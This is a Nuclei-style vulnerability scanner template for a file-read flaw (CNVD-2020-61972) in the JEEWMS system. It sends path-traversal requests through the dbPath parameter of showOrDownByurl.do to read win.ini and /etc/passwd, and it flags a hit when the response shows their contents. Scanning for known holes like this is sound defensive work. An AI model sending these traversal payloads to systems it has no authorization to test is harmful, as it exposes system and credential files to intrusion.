id: JEEWMS-fileRead

info:
  name: JEEWMS 系统 showOrDownByurl.do 文件 down 参数本地文件包含漏洞（CNVD-2020-61972）
  author: Str1am
  severity: high
  reference: https://github.com/EdgeSecurityTeam/Vulnerability/blob/main/JEEWMS%20%E6%9C%AA%E6%8E%88%E6%9D%83%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
  tags: JEEWMS,fileRead

requests:
  - method: GET
    path:
      - "{{BaseURL}}/systemController/showOrDownByurl.do?down=&dbPath=../Windows/win.ini"
      - "{{BaseURL}}/systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "extensions"
          - "root:x"
        part: body
        condition: or
